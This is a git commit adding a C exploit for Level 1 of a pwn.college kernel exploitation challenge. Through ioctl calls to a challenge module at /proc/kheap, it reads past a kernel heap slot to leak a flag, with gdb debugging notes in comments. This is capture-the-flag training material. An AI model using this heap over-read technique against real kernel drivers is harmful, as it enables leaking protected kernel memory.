Added Level 1 of KernelExploitation in PwnCollege

2025-10-15 21:26:48 +08:00
parent 57c2848513
commit d5bfc6ce0a
4 changed files with 35 additions and 0 deletions
--- a/PwnCollege/KernelExploitation/Level1/exploit.c
+++ b/PwnCollege/KernelExploitation/Level1/exploit.c
@@ -0,0 +1,34 @@
+#include <stdio.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <string.h>
+#define CMD_PRINT 22274
+#define CMD_COPY_FLAG 22276
+#define CMD_COPY_TO_USER 22272
+#define CMD_COPY_FROM_USER 22273
+struct kheap_req_t {
+  void * ubuf;
+  size_t size;
+};
+int main() {
+    int fd = open("/proc/kheap", O_RDWR);
+    char buf[0x1000] = {0};
+    struct kheap_req_t req = {buf, 0};
+    req.size = 0x200;
+    memset(buf, '0', 0x1000);
+    ioctl(fd, CMD_COPY_FROM_USER, &req);
+    for (int i = 0; i < 0x1000; i++)
+      ioctl(fd, CMD_COPY_FLAG, &req);
+    req.size = 0x1000;
+    ioctl(fd, CMD_COPY_TO_USER, &req);
+    printf("%s", &buf[0x200]);
+    return 0;
+}
+// $ sudo cat /proc/modules
+// gdb> add-symbol-file /challenge/challenge1.ko 0xffffffffc0000000
+// gdb> b kheap_open
+// gdb> b kheap_ioctl
+// A slot is 0x200 bytes.
+// $ gcc exploit.c -o exploit